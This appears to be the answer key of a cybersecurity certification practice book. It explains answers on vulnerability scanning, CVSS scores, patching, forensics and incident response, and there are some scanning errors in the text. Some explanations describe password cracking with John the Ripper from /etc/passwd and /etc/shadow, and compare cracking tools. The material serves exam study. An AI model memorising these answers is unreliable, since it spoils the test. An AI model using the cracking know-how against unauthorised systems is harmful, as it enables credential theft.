A. PCI DSS requires that networks be scanned quarterly or after any “significant change in 
the network.” A firewall upgrade definitely qualifies as a significant network change, and 
Chanda should schedule a vulnerability scan immediately to maintain PCI DSS compliance. 


A. Network segmentation is one of the strongest controls that may be used to protect 
industrial control systems and SCADA systems by isolating them from other systems on 
the network. Input validation and memory protection may provide some security, but the 
mitigating effect is not as strong as isolating these sensitive systems from other devices 
and preventing an attacker from connecting to them in the first place. Redundancy may 
increase uptime from accidental failures but would not protect the systems from attack. 


C. While any of these reasons are possible, the most likely cause of this result is that the 
system administrator blocked the scanner with a host firewall rule. It is unlikely that the 
administrator completed the lengthy, time-consuming work overnight and without caus- 
ing a service disruption. If the server were down, other IT staff would have reported the 
issue. If the scan did not run, Glenda would not see any entries in the scanner’s logs. 


B. Any addresses in the 10.x.x.x, 172.16.x.x, and 192.168.x.x ranges are private IP 
addresses that are not routable over the Internet. Therefore, of the addresses listed, only 
12.8.1.100 could originate outside the local network. 


B. The most likely issue here is that there is a network firewall between the server and the 
third-party scanning service. This firewall is blocking inbound connections to the web 
server and preventing the external scan from succeeding. CIFS generally runs on port 445, 
not port 80 or 443. Those ports are commonly associated with web services. The scanner 
is not likely misconfigured because it is successfully detecting other ports on the server. 
Nick should either alter the firewall rules to allow the scan to succeed or, preferably, place 
a scanner on a network in closer proximity to the web server. 
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A. Change management processes should always include an emergency change proce- 
dure. This procedure should allow applying emergency security patches without working 
through the standard change process. Thomas has already secured stakeholder approval 
on an informal basis so he should proceed with the patch and then file a change request 
after the work is complete. Taking the time to file the change request before complet- 

ing the work would expose the organization to a critical security flaw during the time 
required to complete the paperwork. 


C. The label A designates the guest operating systems in this environment. Each virtualization 
platform may run multiple guest operating systems, all of whom share physical resources. 


A. The label B designates the hypervisor in this environment. In a bare-metal virtualiza- 
tion environment, the hypervisor sits beneath the guest operating systems and controls 
access to memory, disk, CPU, and other system resources. 


D. The label C designates the physical hardware in this environment. In a bare-metal vir- 
tualization environment, the physical hardware sits beneath the hypervisor, which moder- 
ates access by guest operating systems. There is no host operating system in a bare-metal 
virtualization approach. 


B. The vulnerability description indicates that this software has reached its end-of-life 
(EOL) and, therefore, is no longer supported by Microsoft. Mike’s best solution is to 
remove this version of the framework from the affected systems. No patches will be 
available for future vulnerabilities. There is no indication from this result that the systems 
require operating system upgrades. Mike should definitely take action because of the 
critical severity (5 on a five-point scale) of this vulnerability. 


B. Credentialed scans are able to log on to the target system and directly retrieve configu- 
ration information, providing the most accurate results of the scans listed. Unauthenti- 
cated scans must rely upon external indications of configuration settings, which are not as 
accurate. The network location of the scanner (external vs. internal) will not have a direct 
impact on the scanner’s ability to read configuration information. 


C. The best path for Brian to follow would be to leverage the organization’s existing 
trouble ticket system. Administrators likely already use this system on a regular basis, and 
it can handle reporting and escalation of issues. Brian might want to give administrators 
access to the scanner and/or have emailed reports sent automatically as well, but those 
will not provide the tracking that he desires. 


A. Vulnerability scanners should be updated as often as possible to allow the scanner to 
retrieve new vulnerability signatures as soon as they are released. Tonya should choose 
daily updates. 


C. Ben is facing a difficult challenge and should likely perform all of the actions described 
in this question. However, the best starting point would be to run Windows Update to 
install operating system patches. Many of the critical vulnerabilities relate to missing 
Windows patches. The other actions may also resolve critical issues, but they all involve 
software that a user must run on the server before they can be exploited. This makes them 
slightly lower priorities than the Windows flaws that may be remotely exploitable with no 
user action. 
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A. Tom should consult service level agreements (SLAs) and memorandums of understand- 
ing (MOUs). These documents should contain all commitments made to customers related 
to performance. Disaster recovery plans (DRPs) and business impact assessments (BIAs) 
should not contain this type of information. 


C. Don should likely focus his efforts on high-priority vulnerabilities, as vulnerability 
scanners will report results for almost any system scanned. The time to resolve critical 
vulnerabilities, the number of open critical vulnerabilities over time, and the number 

of systems containing critical vulnerabilities are all useful metrics. The total number of 
reported vulnerabilities is less useful because it does not include any severity information. 


A. Although the vulnerability scan report does indicate that this is a low-severity vulner- 
ability, Don must take this information in context. The management interface of a virtu- 
alization platform should never be exposed to external hosts, and it also should not use 
unencrypted credentials. In that context, this is a critical vulnerability that could allow 
an attacker to take control of a large portion of the computing environment. Don should 
work with security and network engineers to block this activity at the firewall as soon 

as possible. Shutting down the virtualization platform is not a good alternative because 
it would be extremely disruptive, and the firewall adjustment is equally effective from a 
security point of view. 


B. The server described in this report requires multiple Red Hat Linux and Firefox 
patches to correct serious security issues. One of those Red Hat updates also affect the 
MySQL database service. While there are Oracle patches listed on this report, they relate 
to Oracle Java, not an Oracle database. 


D. The Technical Report will contain detailed information on a specific host and is 
designed for an engineer seeking to remediate the system. The PCI Technical Report 
would focus on credit card compliance issues, and there is no indication that this server is 
used for credit card processing. The Qualys Top 20 Report and Executive Report would 
contain summary information more appropriate for a management audience and covering 
an entire network, rather than providing detailed information on a single system. 


D. The use of FTP is not considered a good security practice. Unless tunneled through a 
secure protocol, FTP is unencrypted, allowing an attacker to eavesdrop on communica- 
tions and steal credentials that may be transmitted over FTP links. Additionally, this vul- 
nerability indicates that an attacker can gain access to the server without even providing 
valid credentials. 


B. The scan report shows two issues related to server accounts: a weak password policy 
for the Administrator account and an active Guest account. Tom should remediate these 
issues to protect against the insider threat. The server also has an issue with weak encryp- 
tion, but this is a lower priority given that the machine is located on an internal network. 


B. While all of the solutions listed may remediate some of the vulnerabilities discovered 
by Dave’s scan, the vast majority of issues in an unmaintained network result from miss- 
ing security updates. Applying patches will likely resolve quite a few vulnerabilities, if not 
the majority of them. 
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D. Matt should separate the two networks using a network segmentation technique, 
such as placing the new company on a separate VLAN or firewalling the two networks. 
A proxy server would not be effective because there is no indication that either network 
intends to offer services to the other. 


C. Rhonda should deploy the patch in a sandbox environment and then thoroughly test 
it prior to releasing it in production. This reduces the risk that the patch will not work 
well in her environment. Simply asking the vendor or waiting 60 days may identify some 
issues, but it does not sufficiently reduce the risk because the patch will not have been 
tested in her company’s environment. 


B. Service level agreements (SLAs) specify the technical parameters of a vendor relation- 
ship and should include coverage of service availability as well as remedies for failure to 
meet the agreed-upon targets. Memorandums of understanding (MOUs) are less formal 
documents that outline the relationship between two organizations. Business partnership 
agreements (BPAs) typically cover business, rather than technical, issues and would not 
normally include availability commitments. Business impact assessments (BIAs) are risk 
assessments and are not legal agreements. 


D. While all of these vulnerabilities do pose a confidentiality risk, the SQL injection vul- 
nerability poses the greatest threat because it may allow an attacker to retrieve the con- 
tents of a backend database. The HTTP TRACK/TRACE methods and PHP information 
disclosure vulnerabilities may provide reconnaissance information but would not directly 
disclose sensitive information. SSLv3 is no longer considered secure but is much more dif- 
ficult to exploit for information theft than a SQL injection issue. 


C. Bring your own device (BYOD) strategies allow users to operate personally owned 
devices on corporate networks. These devices are more likely to contain vulnerabilities 
than those managed under a mobile device management (MDM) system or a corporate- 
owned, personally enabled (COPE) strategy. Transport Layer Security (TLS) is a network 
encryption protocol, not a mobile device strategy. 


A. This is a critical vulnerability that should be addressed immediately. In this case, 
Kassie should decommission the server and replace it with a server running a current 
operating system. Microsoft no longer supports Windows Server 2003 and will not issue 
patches for vulnerabilities identified after July 2015. 


B. Morgan or the domain administrator could remove the software from the system, but 
this would not allow continued use of the browser. The network administrator could theo- 
retically block all external web browsing, but this is not a practical solution. The browser 
developer is the only one in a good situation to correct an overflow error because it is a 
flaw in the code of the web browser. 


A. Jeff should begin by looking at the highest-severity vulnerabilities and then identify 
whether they are confidentiality risks. The highest-severity vulnerability on this report is 
the Rational ClearCase Portscan Denial of Service vulnerability. However, a denial-of- 
service vulnerability affects availability, rather than confidentiality. The next highest- 
severity report is the Oracle Database TNS Listener Poison Attack vulnerability. A poi- 
soning vulnerability may cause hosts to connect to an illegitimate server and could result 
in the disclosure of sensitive information. Therefore, Jeff should address this issue first. 
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B. While all of these concerns are valid, the most significant problem is that Eric does not 
have permission from the potential client to perform the scan and may wind up angering 
the client (at best) or violating the law (at worst). 


B. The firewall rules would provide Renee with information about whether the service is 
accessible from external networks. Server logs would contain information on actual access 
but would not definitively state whether the server is unreachable from external addresses. 
Intrusion detection systems may detect an attack in progress but are not capable of blocking 
traffic and would not be relevant to Renee’s analysis. Data loss prevention systems protect 
against confidentiality breaches and would not be helpful against an availability attack. 


D. Mary should consult the organization’s asset inventory. If properly constructed and 
maintained, this inventory should contain information about asset criticality. The CEO 
may know some of this information, but it is unlikely that he or she would have all of the 
necessary information or the time to review it. System names and IP addresses may con- 
tain some hints to asset criticality but would not be as good a source as an asset inventory 
that clearly identifies criticality. 


A. The vulnerability description indicates that this is a vulnerability that exists in versions 
of Nessus earlier than 6.6. Upgrading to a more recent version of Nessus would correct 
the issue. 


C. Passive network monitoring meets Sarah’s requirements to minimize network band- 
width consumption while not requiring the installation of an agent. Sarah cannot use 
agent-based scanning because it requires application installation. She should not use 
server-based scanning because it consumes bandwidth. Port scanning does not provide 
vulnerability reports. 


D. Of the answers presented, the maximum number of simultaneous hosts per scan is 
most likely to have an impact on the total bandwidth consumed by the scan. Enabling safe 
checks and stopping the scanning of unresponsive hosts is likely to resolve issues where 

a single host is negatively affected by the scan. Randomizing IP addresses would only 
change the order of scanning systems. 


C. The issue raised by this vulnerability is the possibility of eavesdropping on adminis- 
trative connections to the database server. Requiring the use of a VPN would add strong 
encryption to this connection and negate the effect of the vulnerability. A patch is not an 
option because this is a zero-day vulnerability, meaning that a patch is not yet available. 
Disabling administrative access to the database server would be unnecessarily disrup- 
tive to the business. The web server’s encryption level is irrelevant to the issue as it would 
affect connections to the web server, not the database server. 


A. Ina remote code execution attack, the attacker manages to upload arbitrary code to a 
server and run it. These attacks are often because of the failure of an application or oper- 
ating system component to perform input validation. 


C. Of the documents listed, only corporate policy is binding upon Raul, and he should 
ensure that his new system’s configuration complies with those requirements. The other 
sources may provide valuable information to inform Raul’s work, but compliance with 

them is not mandatory. 
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A. The server with IP address 10.0.102.58 is the only server on the list that contains 

a level 5 vulnerability. Level 5 vulnerabilities have the highest severity and should be 
prioritized. The server at 10.0.16.58 has the most overall vulnerabilities but does not have 
any level 5 vulnerabilities. The servers at 10.0.46.116 and 10.0.69.232 have only level 3 
vulnerabilities, which are less severe than level 5 vulnerabilities. 


A. Enabling credentialed scanning would increase the likelihood of detecting vulnerabili- 
ties that require local access to a server. Credentialed scans can read deep configuration 
settings that might not be available with an uncredentialed scan of a properly secured 
system. Updating the vulnerability feed manually may add a signature for this particular 
vulnerability but would not help with future vulnerabilities. Instead, Beth should config- 
ure automatic feed updates. Increasing the scanning frequency may increase the speed of 
detection but would not impact the scanner’s ability to detect the vulnerability. The orga- 
nization’s risk appetite affects what vulnerabilities they choose to accept but would not 
change the ability of the scanner to detect a vulnerability. 


A. Applying patches to the server will not correct SQL injection or cross-site scripting 
flaws, as these reside within the web applications themselves. Shannon could correct the 
root cause by recoding the web applications to use input validation, but this is the more 
difficult path. A web application firewall would provide immediate protection with lower 
effort. 


A. There is no reasonable justification for Ron reviewing the reports prior to providing 
them to the administrators responsible for the systems. In the interests of transparency 
and efficiency, he should configure the scans to run automatically and send automated 
notifications to administrators as soon as they are generated. This allows immediate reme- 
diation. There is nothing preventing Ron from performing a review of the scan results, but 
he should not filter them before providing them to the responsible engineers. 


C. This error indicates that the vulnerability scanner was unable to verify the signature 
on the digital certificate used by the web server. If the organization is using a self-signed 
digital certificate for this internal application, this would be an expected result. 


C. Cross-site scripting and cross-site request forgery vulnerabilities are normally easy to 
detect with vulnerability scans because the scanner can obtain visual confirmation of a 
successful attack. Unpatched web servers are often identified by using publicly accessible 
banner information. While scanners can often detect many types of SQL injection vulner- 
abilities, it is often difficult to confirm blind SQL injection vulnerabilities because they do 
not return results to the attacker but rely upon the silent (blind) execution of code. 


B. Analyzing and reporting findings to management is one of the core tasks of a con- 
tinuous monitoring program. Another core task is responding to findings by mitigating, 
accepting, transferring, or avoiding risks. Continuous monitoring programs are not tasked 
with performing forensic investigations, as this is an incident response process. 


A. The phpinfo file is a testing file often used by web developers during the initial con- 
figuration of a server. While any of the solutions provided here may remediate this vulner- 
ability, the most common course of action is to simply remove this file before the server is 
moved into production or made publicly accessible. 
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D. The Unknown Device Report will focus on systems detected during the scan that are 
not registered with the organization’s asset management system. The High Severity Report 
will provide a summary of critical security issues across all systems. The Technical 

Report will likely contain too much detail and may not call out unknown systems. The 
Patch Report will indicate systems and applications that are missing patches but not 
necessarily identify unknown devices. 


B. Continuous monitoring uses agents installed on monitored systems to immediately 
report configuration changes to the vulnerability scanner. Scheduled scans would not 
detect a change until the next time they run. Automated remediation would correct secu- 
rity issues rather than report configuration changes. Automatic updates would ensure that 
scans use the most current vulnerability information. 


D. The manager has thought about the risk and, in consultation with others, determined 
that it is acceptable. Therefore, Mark should not press the matter and demand remedia- 
tion, either now or in six months. He should mark this vulnerability as an approved 
exception in the scanner to avoid future alerts. It would not be appropriate to mark this as 
a false positive because the vulnerability detection was accurate. 


C. Jacquelyn should update the vulnerability feed to obtain the most recent signatures 
from the vendor. She does not need to add the web servers to the scan because they are 
already appearing in the scan report. Rebooting the scanner would not necessarily update 
the feed. If she waits until tomorrow, the scanner may be configured to automatically 
update the feed, but this is not guaranteed and is not as efficient as simply updating the 
feed now. 


A. Extensible Configuration Checklist Description Format (XCCDF) is a language for 
specifying checklists and reporting checklist results. Common Configuration Enumera- 
tion (CCE) provides a standard nomenclature for discussing system configuration issues. 
Common Platform Enumeration (CPE) provides a standard nomenclature for describing 
product names and versions. Common Vulnerabilities and Exposures (CVE) provides a 
standard nomenclature for describing security-related software flaws. 


A. FISMA does specify many requirements for agencies that conduct vulnerability scans, 
but it does not contain any specific requirements regarding the frequency of the scans. It 
merely states that agencies must conduct scans of information systems and hosted applica- 
tions when new vulnerabilities potentially affecting the system/application are identified 
and reported. 


C. It would be difficult for Sharon to use agent-based or credentialed scanning in an 
unmanaged environment because she would have to obtain account credentials for each 
scanned system. Of the remaining two technologies, server-based scanning is more 
effective at detecting configuration issues than passive network monitoring. 


D. To be used in a secure manner, certificates must take advantage of a hash function that 
is not prone to collisions. The MD2, MD4, MDS, and SHA-1 algorithms all have dem- 
onstrated weaknesses and would trigger a vulnerability. The SHA-256 algorithm is still 
considered secure. 
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B. This vulnerability should not prevent users from accessing the site, but it will cause 
their browsers to display a warning that the site is not secure. 


B. This error is a vulnerability in the certificate itself and may be corrected only by 
requesting a new certificate from the certificate authority (CA) that uses a secure hash 
algorithm in the certificate signature. 


A. Secure shell (SSH) traffic flows over TCP port 22. Port 636 is used by the Lightweight 
Directory Access Protocol (LDAP). Port 1433 is used by Microsoft SQL Server. Port 1521 
is used by Oracle databases. 


C. This error occurs when the server name on a certificate does not match the name of 
the server in question. It is possible that this certificate was created for another device or 
that the device name is slightly different than that on the certificate. Terry should resolve 
this error by replacing the certificate with one containing the correct server name. 


B. Lori should absolutely not try to run scans without the knowledge of other IT staff. 
She should inform her team of her plans and obtain permission for any scans that she 
runs. She should limit scans of production systems to safe plug-ins while she is learning. 
She should also limit the bandwidth consumed by her scans and the time of her scans to 
avoid impacts on production environments. 


D. Credentialed scans are also known as authenticated scans and rely upon having 
credentials to log onto target hosts and read their configuration settings. Meredith should 
choose this option. 


A. Norman’s manager is deciding to use the organization’s risk appetite (or risk tolerance) 
to make this decision. He is stating that the organization will tolerate medium severity 
risks but will not accept critical or high-severity risks. This is not a case of a false positive 
or false negative error, as they are not discussing a specific vulnerability. The decision is 
not based upon data classification because the criticality or sensitivity of information was 
not discussed. 


D. Birthday attacks occur when an attacker is able to discover multiple inputs that gener- 
ate the same output. This is an event known as a collision. 


A. The security and web development communities both consider Adobe Flash an out- 
dated and insecure technology. The best solution would be for Meredith to remove this 
software from systems in her organization. Applying the security patches would be a 
temporary solution, but it is likely that new vulnerabilities will arise soon requiring more 
patches. Blocking inbound access to the workstations would not be effective because Flash 
vulnerabilities are typically exploited after a client requests a malicious file. An intru- 

sion detection system may alert administrators to malicious activity but does not perform 
blocking. 


D. The CVSS vector for this vulnerability contains the string “AV:N.” This indicates 
that the access vector is Network, meaning that an attacker can exploit the vulnerability 
remotely over the network. 
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C. The CVSS vector for this vulnerability contains the string “AC:L.” This indicates that 
the access complexity is Low, meaning that an attacker can exploit the vulnerability with- 
out any specialized conditions occurring. 


C. The CVSS vector for this vulnerability contains the string “Au:N.” This indicates that 
the authentication metric for this vector is None, meaning that an attacker would not 
need to authenticate to exploit this vulnerability. 


B. This vulnerability discloses the type of database server supporting the web application 
but no other information. The CVSS vector contains the string “C:P,” which indicates 
that the Confidentiality metric is Partial, meaning that access to some information is pos- 
sible, but the attacker does not have control over what information is compromised. 


A. This vulnerability does not allow the attacker to modify any information on the sys- 
tem. This is confirmed by the CVSS string “I:N” indicating that the Integrity metric is 
None. 


A. This vulnerability does not allow the attacker to affect the availability of the system. 
This is confirmed by the CVSS string “A:N” indicating that the Availability metric is 
None. 


D. The scenario does not indicate that Dan has any operational or managerial control 
over the device or the administrator, so his next step should be to escalate the issue to an 
appropriate manager for resolution. Dan should not threaten the engineer because there is 
no indication that he has the authority to do so. Dan cannot correct the vulnerability him- 
self because he should not have administrative access to network devices as a vulnerability 
manager. He should not mark the vulnerability as an exception because there is no indica- 
tion that it was accepted through a formal exception process. 


A. Ina well-managed test environment, the test systems should be configured in a near- 
identical manner to production systems. They should be running the same operating 
systems and require the same patches. However, in almost every organization, there are 
systems running in production that do not have mirror deployments in test environments 
because of cost, legacy system issues, and other reasons. 


D. The vulnerability scan of this server has fairly clean results. All of the vulnerabilities 
listed are severity 3 or lower. In most organizations, immediate remediation is required 
only for severity 4 or S vulnerabilities. 


A. Laura should contact the vendor to determine whether a patch is available for the 
appliance. She should not attempt to modify the appliance herself, as this may cause oper- 
ational issues. Laura has no evidence to indicate that this is a false positive report, and 
there is no reason to wait 30 days to see whether the problem resolves itself. 


C. Credit card information is subject to the Payment Card Industry Data Security Stan- 
dard (PCI DSS), which contains specific provisions that dictate the frequency of vulner- 
ability scanning. While the other data types mentioned in the question are regulated, 
none of those regulations contains specific provisions that identify a required vulnerability 
scanning frequency. 
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C. Jim could resolve this issue by adding additional scanners to balance the load, reducing 
the frequency of scans or reducing the scope (number of systems) of the scan. Changing the 
sensitivity level would not likely have a significant impact on the scan time. 


C. This is a critical vulnerability in a public-facing service and should be patched 
urgently. However, it is reasonable to schedule an emergency maintenance for the evening 
and inform customers of the outage several hours in advance. Therefore, Trevor should 
immediately begin monitoring affected systems for signs of compromise and work with 
the team to schedule maintenance for as soon as possible. 


D. The best practice for securing virtualization platforms is to expose the management 
interface only to a dedicated management network, accessible only to authorized engi- 
neers. This greatly reduces the likelihood of an attack against the virtualization platform. 


A. Deploying changes in a sandbox environment provides a safe place for testing changes 
that will not affect production systems. Honeypots and honeynets are not testing environ- 
ments but, rather, are decoy services used to attract attackers. Vendor patches should not 
normally be tested in production because of the potential impact on business operations. 


B. If possible, Becky should schedule the scans during periods of low activity to reduce 
the impact they have on business operations. The other approaches all have a higher risk 
of causing a disruption. 


D. The attack vector (AV:N) indicates that the attacker may exploit this vulnerability 
remotely over the network without requiring any local user account on the targeted server. 


Chapter 3: Domain 3: Cyber Incident 
Response 


1. 


B. Lucca only needs a verifiable MDS hash to validate the files under most circumstances. 
This will let him verify that the file he downloaded matches the hash of the file that the 
vendor believes they are providing. There have been a number of compromises of ven- 

dor systems, including open source projects that included distribution of malware that 
attackers inserted into the binaries or source code available for download, making this an 
important step when security is critical to an organization. 


C. The amount of metadata included in photos varies based on the device used to take 
them, but GPS location, GPS timestamp-based time (and thus correct, rather than device 
native), and camera type can all potentially be found. Image files do not track how many 
times they have been copied! 


A. Chris needs both /etc/passwd and /etc/shadow for John to crack the passwords. 
While only hashes are stored, John the Ripper includes built-in brute-force tools that will 
crack the passwords. 
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B. The Sysinternals suite provides two tools for checking access, AccessEnum and Access- 
Chk. AccessEnum is a GUI-based program that gives a full view of filesystem and registry 
settings and can display either files with permissions that are less restrictive than the par- 
ent or any files with permissions that differ from the parent. AccessChk is a command- 
line program that can check the rights a user or group has to resources. 


A. John is not responding to an incident, so this is an example of proactive network seg- 
mentation. If he discovered a system that was causing issues, he might create a dedicated 
quarantine network or could isolate or remove the system. 


C. NIST describes events like this as security incidents because they are a violation or 
imminent threat of violation of security policies and practices. An adverse event is any 
event with negative consequences, and an event is any observable occurrence on a system 
or network. 


B. In most cases, the first detection type Jennifer should deploy is a rogue SSID detection 
capability. This will help her reduce the risk of users connecting to untrusted SSIDs. She 
may still want to conduct scans of APs that are using channels they should not be, and 

of course her network should either use network access controls or scan for rogue MAC 
addresses to prevent direct connection of rogue APs and other devices. 


C. Dan’s efforts are part of the preparation phase, which involves activities intended to 
limit the damage an attacker could cause. 


B. Organizations that process credit cards work with acquiring banks to handle their 
card processing, rather than directly with the card providers. Notification to the bank is 
part of this type of response effort. Requiring notification of law enforcement is unlikely, 
and the card provider listing specifies only two of the major card vendors, none of which 
are specified in the question. 


B. Linux provides a pair of useful ACL backup and restore commands: getfacl allows 
recursive backups of directories, including all permissions to a text file, and setfacl 
restores those permissions from the backup file. Both aclman and chbkup were made up 
for this question. 


B. In cases where an advanced persistent threat (APT) has been present for an unknown 
period of time, backups should be assumed to be compromised. Since APTs often have 
tools that cannot be detected by normal anti-malware techniques, the best option that 
Charles has is to carefully rebuild the systems from the ground up and then ensure that 
they are fully patched and secured before returning them to service. 


A. FileVault does allow trusted accounts to unlock the drive but not by changing the key. 
FileVault 2 keys can be recovered from memory for mounted volumes and much like Bit- 
Locker, it suggests that users record their recovery key, so Jessica may want to ask the user 
or search their office or materials if possible. Finally, FileVault keys can be recovered from 
iCloud, providing her with a third way to get access to the drive. 
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C. The series of connection attempts shown is most likely associated with a port scan. A 
series of failed connections to various services within a few seconds (or even minutes) is 
common for a port scan attempt. A denial-of-service attack will typically be focused on a 
single service, while an application that cannot connect will only be configured to point at 
one database service, not many. A misconfigured log source either would send the wrong 
log information or would not send logs at all in most cases. 


D. Windows audits account creation by default. Frank can search for account creation 
events under event ID 4720 for modern Windows operating systems. 


A. Purging requires complete removal of data, and cryptographic erase is the only option 
that will fully destroy the contents of a drive from this list. Reformatting will leave the 
original data in place, overwriting leaves the potential for file remnants in slack space, and 
repartitioning will also leave data intact in the new partitions. 


B. Unless she already knows the protocol that a particular beacon uses, filtering out 
beacons by protocol may cause her to miss beaconing behavior. Attackers want to dodge 
common analytical tools and will use protocols that are less likely to attract attention. 
Filtering network traffic for beacons based on the intervals and frequency they are sent at, 
if the beacon persists over time, and removing known traffic are common means of filter- 
ing traffic to identify beacons. 


C. Local scans often provide more information than remote scans because of network or 
host firewalls that block access to services. The second most likely answer is that Scott or 
Joanna used different settings when they scanned. 


C. A general best practice when dealing with highly sensitive systems is to encrypt copies 
of the drives before they are sent to third parties. Adam should encrypt the drive image 
and provide both the hash of the image and the decryption key under separate cover (sent 
via a separate mechanism) to ensure that losing the drive itself does not expose the data. 
Once the image is in the third-party examiner’s hands, they will be responsible for its 
security. Adam may want to check on what their agreement says about security! 


B. A hardware write blocker can ensure that connecting or mounting the drive does not 
cause any changes to occur on the drive. Mika should create one or more forensic images 
of the original drive and then work with the copy or copies as needed. She may then opt to 
use forensic software, possibly including a software write blocker. 


A. This form is a sample chain of custody form. It includes information about the case, 
copies of drives that were created, and who was in possession of drives, devices, and cop- 
ies during the investigation. 


C. CompTIA defines two phases: incident eradication and validation. Validation phase 
activities per CompTIA’s split include patching, permissions, scanning, and verifying log- 
ging works properly. 


B. SNMP, packet sniffing, and netflow are commonly used when monitoring bandwidth 
consumption. Portmon is an aging Windows tool used to monitor serial ports, not exactly 
the sort of tool you’d use to watch your network’s bandwidth usage! 
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B. James can temporarily create an untrusted network segment and use a span port or tap 
to allow him to see traffic leaving the infected workstation. Using Wireshark, he can build 
a profile of the traffic it sends, helping him build a fingerprint of the beaconing behavior. 
Once he has this information, he can then use it in his recovery efforts to ensure that other 
systems are not similarly infected. 


C. The output of lsof shows a connection from the local host (10.0.2.6) to remote 
.host.com via ssh. The listing for /bin/bash simply means that demo is using the bash 
shell. Fred hasn’t found evidence of demo accessing other systems on his local network but 
might find the outbound ssh connection interesting. 


B. Conducting a lessons-learned review after using an incident response plan can help to 
identify improvements and to ensure that the plan is up-to-date and ready to handle new 
events. 


B. If Kathleen’s company uses a management system or inventory process to capture the 
MAC addresses of known organizationally owned systems, then a MAC address report 
from her routers and switches will show her devices that are connected that are not in 
inventory. She can then track down where the device is physically connected to the port on 
the router or switch to determine whether the device should be there. 


C. When /var fills up, it is typically due to log files filling up all available space. The 
/var partition should be reviewed for log files that have grown to extreme size or that are 
not properly set to rotate. 


D. Linux permissions are read numerically as “owner, group, other.” The numbers stand 
for read: 4, write: 2, and execute: 1. Thus, a 7 provides that person, group, or other with 
read, write, and execute. A 4 means read-only, a 5 means read and execute, without write, 
and so on. 777 provides the broadest set of permissions, and 000 provides the least. 


C. Improper usage, which results from violations of an organization’s acceptable use 
policies by authorized users, can be reduced by implementing a strong awareness program. 
This will help ensure users know what they are permitted to do and what is prohibited. 
Attrition attacks focus on brute-force methods of attacking services. Impersonation 
attacks include spoofing, man-in-the-middle attacks, and similar threats. Finally, web-based 
attacks focus on websites or web applications. Awareness may help with some specific 
web-based attacks like fake login sites, but many others would not be limited by Lauren’s 
awareness efforts. 


C. Incremental mode is John the Ripper’s most powerful mode, as it will try all possible 
character combinations as defined by the settings you enter at the start. Single crack mode 
tries to use login names with various modifications and is very useful for initial testing. 
Wordlist uses a dictionary file along with mangling rules to test for common passwords. 
External mode relies on functions that are custom-written to generate passwords. Exter- 
nal mode can be useful if your organization has custom password policies that you want 
to tweak the tool to use. 
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B. If business concerns override his ability to suspend the system, the best option that 
Charles has is to copy the virtual disk files and then use a live memory imaging tool. This 
will give him the best forensic copy achievable under the circumstances. Snapshotting 

the system and booting it will result in a loss of live memory artifacts. Escalating may be 
possible in some circumstances, but the scenario specifies that the system must remain 
online. Finally, volatility can capture memory artifacts but is not designed to capture a 
full virtual machine. 


B. Re-assembling the system to match its original configuration can be important in 
forensic investigations. Color-coding each cable and port as a system is disassembled 
before moving helps to ensure proper re-assembly. Mika should also have photos taken by 
the on-site investigators to match her re-assembly work to the on-site configuration. 


D. The Signal protocol is designed for secure end-to-end messaging, and using a distinct 
messaging tool for incident response can be helpful to ensure that staff separate incident 
communication from day-to-day operations. Text messaging is not secure. Email with 
TLS enabled is encrypted only between the workstation and email server and may be 
exposed in plain text at rest and between other servers. A Jabber server with TLS may be 
a reasonable solution but is less secure than a Signal-based application. 


B. Selah should check the error log to determine what web page or file access resulted in 
404 “not found” errors. The errors may indicate that a page is mislinked, but it may also 
indicate a scan occurring against her web server. 


C. Since the drives are being returned at the end of a lease, you must assume that the con- 
tract does not allow them to be destroyed. This means that purging the drives, validating 
that the drives have been purged, and documenting the process to ensure that all drives 
are included are the appropriate actions. Clearing the drives leaves the possibility of data 
recovery, while purging, as defined by NIST SP 800-88, renders data recovery infeasible. 


C. The default macOS drive format is HFS+ and is the native macOS drive format. By 
default, it uses 512-byte logical blocks (sectors) and up to 4,294,967,296 allocation 
blocks. macOS does support FAT32 and can read NTFS but cannot write to NTFS drives 
without additional software. MacFAT was made up for this problem. 


B. Eraser is a tool used to securely wipe files and drives. If Eraser is not typically installed 
on his organization’s machines, Tim should expect that the individual being investigated 
has engaged in some antiforensic activities including wiping files that may have been 
downloaded or used against company policy. This doesn’t mean he shouldn’t continue his 
investigation, but he may want to look at Eraser’s log for additional evidence of what was 
removed. 


B. Data carving is the process of identifying files based on file signatures such as headers 
and footers and then pulling the information between those locations out as a file. Jessica 
can use common carving tools or could manually carve files if she knows common header 
and footer types that she can search for. 
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D. A CSIRT leader must have authority to direct the incident response process and should 
be able to act as a liaison with organizational management. While Lauren may not have 
deep incident response experience, she is in the right role to provide those connections and 
leadership. She should look at retaining third-party experts for incidents if she needs addi- 
tional skills or expertise on her IR team. 


B. This system is not connected to a domain (default domain name has no value), and the 
default user is admin. 


A. The NX bit sets fine-grained permissions to mapped memory regions, while ASLR 
ensures that shared libraries are loaded at randomized locations, making it difficult for 
attackers to leverage known locations in memory via shared library attacks. DEP is a 
Windows tool for memory protection, and position-independent variables are a compiler- 
level protection that is used to secure programs when they are compiled. 


C. If the Security log has not rotated, Angela should be able to find the account creation 

under event ID 4720. The System log does not contain user creation events, and user pro- 
file information doesn’t exist until the user’s first login. The registry is also not a reliable 

source of account creation date information. 


A. The Linux file command shows a file’s format, encoding, what libraries it is linked 
to, and its file type (binary, ASCII text, etc.). Since Alex suspects that the attacker used 
statically linked libraries, the file command is the best command to use for this scenario. 
stat provides the last time accessed, permissions, UID and GID bit settings, and other 
details. It is useful for checking when a file was last used or modified but won’t provide 
details about linked libraries. strings and grep are both useful for analyzing the content 
of a file and may provide Alex with other hints but won’t be as useful as the file com- 
mand for this purpose. 


D. Lauren will get the most information by setting auditing to All but may receive a very 
large number of events if she audits commonly used folders. Auditing only success or fail- 
ure would not show all actions, and full control is a permission, not an audit setting. 


A. The apt command is used to install and upgrade packages in Ubuntu Linux from 

the command line. The command apt-get -u upgrade will list needed upgrades and 
patches (and adding the -V flag will provide useful version information). The information 
about what patches were installed is retained in /var/log/apt, although log rotation may 
remove or compress older update information. 


C. Under most circumstances Ophcrack’s rainbow table-based cracking will result in the 
fastest hash cracking. Hashcat’s high-speed, GPU-driven cracking techniques are likely 

to come in second, with John the Ripper and Cain and Abel’s traditional CPU-driven 
cracking methods remaining slower unless their mutation-based password cracks discover 
simple passwords very quickly. 


A. A logical acquisition focuses on specific files of interest, such as a specific type of file, 
or files from a specific location. In Eric’s case, a logical acquisition meets his needs. A 
sparse acquisition also collects data from unallocated space. A bit-by-bit acquisition is 
typically performed for a full drive and will take longer. 
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A. Resource Manager provides average CPU utilization in addition to real-time CPU uti- 
lization. Since Kelly wants to see average usage over time, she is better off using Resource 
